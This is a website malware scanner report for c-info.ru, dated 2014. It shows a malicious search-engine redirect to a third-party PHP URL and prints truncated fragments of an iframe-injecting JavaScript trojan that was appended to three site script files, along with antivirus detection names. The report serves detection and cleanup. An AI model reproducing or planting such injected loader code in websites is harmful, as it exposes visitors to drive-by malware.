New scan:

Malware Scanner report for c-info.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://decmexico.com/includes/domit/1.php
257 websites infected.

The website "c-info.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://c-info.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: c-info.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Mon, 29 Sep 2014 19:21:22 GMT
Location: http://decmexico.com/includes/domit/1.php
Server: nginx/1.5.7
Content-Type: text/html
X-Powered-By: PHP/5.2.17
malicious

Scanned pages/files

RequestServer responseStatus
http://c-info.ru/
200 OK
Content-Length: 22452
Content-Type: text/html
clean
http://c-info.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 98672
Content-Type: application/javascript
clean
http://c-info.ru/media/system/js/core.js
200 OK
Content-Length: 7094
Content-Type: application/javascript
clean
http://c-info.ru/media/system/js/caption.js
200 OK
Content-Length: 3039
Content-Type: application/javascript
clean
http://c-info.ru/media/com_acymailing/js/acymailing_module.js
200 OK
Content-Length: 12678
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function nnn_action(){
var fuuuSpect = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile'
... 3520 bytes are skipped ...
> }
else // Mootools >= 1.2
{
if(type == 'success'){
form.set('morph');
form.morph({
'height': '0px',
'opacity': 0
});
}

responseContainer.setStyles({
'height': oldContainerHeight,
'opacity': 0
});

responseContainer.set('morph');
responseContainer.morph({
'height': newContainerHeight,
'opacity': 1
});
}
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Ikarus
Trojan.JS.IFrame
TrendMicro-HouseCall
TROJ_GEN.F47V0401
McAfee-GW-Edition
JS/Iframe.gen.ae
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr
McAfee
JS/Iframe.gen.ae

http://c-info.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 2282
Content-Type: application/javascript
clean
http://c-info.ru/modules/mod_jqueryimagescroller/assets/js/jquery.min.js
200 OK
Content-Length: 93839
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function nnn_action(){
var fuuuSpect = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile'
... 3243 bytes are skipped ...
l(this,b,c[d]()))});if(f.isWindow(e)){var g=e.document.documentElement["client"+c];return e.document.compatMode==="CSS1Compat"&&g||e.document.body["client"+c]||g}if(e.nodeType===9)return Math.max(e.documentElement["client"+c],e.body["scroll"+c],e.documentElement["scroll"+c],e.body["offset"+c],e.documentElement["offset"+c]);if(a===b){var h=f.css(e,d),i=parseFloat(h);return f.isNaN(i)?h:i}return this.css(d,typeof a=="string"?a:a+"px")}}),a.jQuery=a.$=f})(window);;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Ikarus
Trojan.JS.IFrame
TrendMicro-HouseCall
TROJ_GEN.F47V0401
McAfee-GW-Edition
JS/Iframe.gen.ae
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr
McAfee
JS/Iframe.gen.ae

http://c-info.ru/modules/mod_jqueryimagescroller/assets/js/scroll.js
200 OK
Content-Length: 7588
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function nnn_action(){
var fuuuSpect = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile'
... 5540 bytes are skipped ...






};























$(document).ready(function(){











$('.infiniteCarousel').infiniteCarousel();











});











;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Ikarus
Trojan.JS.IFrame
TrendMicro-HouseCall
TROJ_GEN.F47V0401
McAfee-GW-Edition
JS/Iframe.gen.ae
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr
McAfee
JS/Iframe.gen.ae

http://c-info.ru/o-kompanii-tsentr-informatiki-pyatigorsk
404 Not Found
Content-Length: 300
Content-Type: text/html
clean
http://c-info.ru/test404page.js
404 Not Found
Content-Length: 274
Content-Type: text/html
clean
http://c-info.ru/o-kompanii-tsentr-informatiki-pyatigorsk/kontakty
404 Not Found
Content-Length: 309
Content-Type: text/html
clean
http://c-info.ru/o-kompanii-tsentr-informatiki-pyatigorsk/otpravit-soobshchenie
404 Not Found
Content-Length: 322
Content-Type: text/html
clean
http://c-info.ru/o-kompanii-tsentr-informatiki-pyatigorsk/novosti
404 Not Found
Content-Length: 308
Content-Type: text/html
clean
http://c-info.ru/o-kompanii-tsentr-informatiki-pyatigorsk/vkhod-dlya-redaktora
404 Not Found
Content-Length: 321
Content-Type: text/html
clean
http://c-info.ru/o-kompanii-tsentr-informatiki-pyatigorsk/razrabotka-sajtov
404 Not Found
Content-Length: 318
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=c-info.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://c-info.ru/

Result: c-info.ru is not infected or malware details are not published yet.